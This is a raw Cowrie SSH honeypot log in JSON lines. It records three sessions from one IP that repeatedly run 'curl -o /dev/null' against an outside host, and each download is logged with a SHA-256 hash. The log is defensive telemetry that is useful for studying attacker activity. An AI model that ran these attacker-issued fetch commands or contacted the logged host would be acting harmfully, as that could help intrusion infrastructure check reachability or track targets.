{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.505729Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.530537Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.531261Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.534332Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.537598Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.538889Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.539430Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.542888Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.545088Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.545930Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.572392Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.574259Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.575548Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.576009Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.579665Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.580662Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.581868Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.585032Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.585597Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.613399Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.614012Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.617623Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.618162Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.620652Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.623256Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.626955Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.627500Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.651732Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.653734Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.656362Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.657772Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.658674Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.662054Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.663119Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.663514Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.669739Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.670168Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.699109Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.699790Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.701514Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.702184Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.706236Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.706911Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.709879Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.712144Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.715822Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.742363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.744095Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.745373Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.745846Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.748085Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.749017Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.751804Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.752302Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.756749Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.784946Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.785571Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.790629Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.791280Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.793545Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.793937Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.841080Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.842835Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.846983Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.849193Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.850508Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.851314Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.855827Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.856944Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.858426Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.859128Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.887694Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.892082Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.893345Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.893924Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.896191Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.896743Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:51.899523Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.899919Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.932319Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:51.934234Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
